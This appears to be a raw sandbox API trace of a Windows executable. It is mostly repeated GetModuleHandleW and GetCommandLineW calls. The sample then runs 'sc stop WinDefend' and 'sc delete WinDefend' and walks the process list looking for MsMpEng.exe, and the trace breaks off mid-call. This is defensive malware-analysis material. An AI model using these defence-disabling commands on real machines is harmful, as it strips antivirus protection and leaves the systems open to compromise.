returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.396] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.396] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.397] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.397] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.398] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.399] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.399] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.400] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.400] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.401] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.401] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.401] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.401] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.401] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.401] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.401] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.401] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.401] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.402] GetStartupInfoW (in: lpStartupInfo=0x50e22d | out: lpStartupInfo=0x50e22d*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0119.402] GetNativeSystemInfo (in: lpSystemInfo=0x28e3d0 | out: lpSystemInfo=0x28e3d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0119.402] GetSystemDirectoryW (in: lpBuffer=0x28e1e4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0119.402] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5580e8 [0119.403] OpenServiceW (hSCManager=0x5580e8, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x558048 [0119.404] QueryServiceStatusEx (in: hService=0x558048, InfoLevel=0x0, lpBuffer=0x28e1a0, cbBufSize=0x24, pcbBytesNeeded=0x28e1cc | out: lpBuffer=0x28e1a0, pcbBytesNeeded=0x28e1cc) returned 1 [0119.404] CloseServiceHandle (hSCObject=0x558048) returned 1 [0119.404] CloseServiceHandle (hSCObject=0x5580e8) returned 1 [0119.405] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x28e170*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e160 | out: lpCommandLine="/c sc stop WinDefend", lpProcessInformation=0x28e160*(hProcess=0x118, hThread=0x114, dwProcessId=0x8a4, dwThreadId=0x8ac)) returned 1 [0119.788] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x28e170*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e160 | out: lpCommandLine="/c sc delete WinDefend", lpProcessInformation=0x28e160*(hProcess=0x11c, hThread=0x120, dwProcessId=0x8b0, dwThreadId=0x89c)) returned 1 [0119.793] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x12c [0119.851] Process32FirstW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0119.851] lstrcmpiW (lpString1="[System Process]", lpString2="MsMpEng.exe") returned -1 [0119.852] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0119.852] lstrcmpiW (lpString1="System", lpString2="MsMpEng.exe") returned 1 [0119.852] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0119.853] lstrcmpiW (lpString1="smss.exe", lpString2="MsMpEng.exe") returned 1 [0119.853] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.853] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0119.853] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0119.854] lstrcmpiW (lpString1="wininit.exe", lpString2="MsMpEng.exe") returned 1 [0119.854] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0119.855] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0119.855] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0119.856] lstrcmpiW (lpString1="winlogon.exe", lpString2="MsMpEng.exe") returned 1 [0119.856] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0119.856] lstrcmpiW (lpString1="services.exe", lpString2="MsMpEng.exe") returned 1 [0119.856] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0119.857] lstrcmpiW (lpString1="lsass.exe", lpString2="MsMpEng.exe") returned -1 [0119.857] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0119.857] lstrcmpiW (lpString1="lsm.exe", lpString2="MsMpEng.exe") returned -1 [0119.857] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.858] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.858] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.859] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.859] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.860] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.860] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.861] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.861] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.862] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.862] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0119.863] lstrcmpiW (lpString1="audiodg.exe", lpString2="MsMpEng.exe") returned -1 [0119.863] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.864] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.864] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0119.865] lstrcmpiW (lpString1="explorer.exe", lpString2="MsMpEng.exe") returned -1 [0119.865] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0119.866] lstrcmpiW (lpString1="dwm.exe", lpString2="MsMpEng.exe") returned -1 [0119.866] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.867] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.867] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0119.867] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MsMpEng.exe") returned 1 [0119.867] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.868] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0119.868] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0119.869] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0119.869] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0119.870] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MsMpEng.exe") returned 1 [0119.870] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0119.871] lstrcmpiW (lpString1="taskeng.exe", lpString2="MsMpEng.exe") returned 1 [0119.871] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0119.872] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MsMpEng.exe") returned 1 [0119.872] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0119.873] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0119.873] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="measurements-cocktail-motivation.exe")) returned 1 [0119.874] lstrcmpiW (lpString1="measurements-cocktail-motivation.exe", lpString2="MsMpEng.exe") returned -1 [0119.874] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur_travelling_usage.exe")) returned 1 [0119.875] lstrcmpiW (lpString1="arthur_travelling_usage.exe", lpString2="MsMpEng.exe") returned -1 [0119.875] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zdnet.exe")) returned 1 [0119.876] lstrcmpiW (lpString1="zdnet.exe", lpString2="MsMpEng.exe") returned 1 [0119.876] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zufilmenyc.exe")) returned 1 [0119.877] lstrcmpiW (lpString1="zufilmenyc.exe", lpString2="MsMpEng.exe") returned 1 [0119.877] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bangbus.exe")) returned 1 [0119.877] lstrcmpiW (lpString1="bangbus.exe", lpString2="MsMpEng.exe") returned -1 [0119.877] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dee_flour.exe")) returned 1 [0119.878] lstrcmpiW (lpString1="dee_flour.exe", lpString2="MsMpEng.exe") returned -1 [0119.878] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressionmed.exe")) returned 1 [0119.879] lstrcmpiW 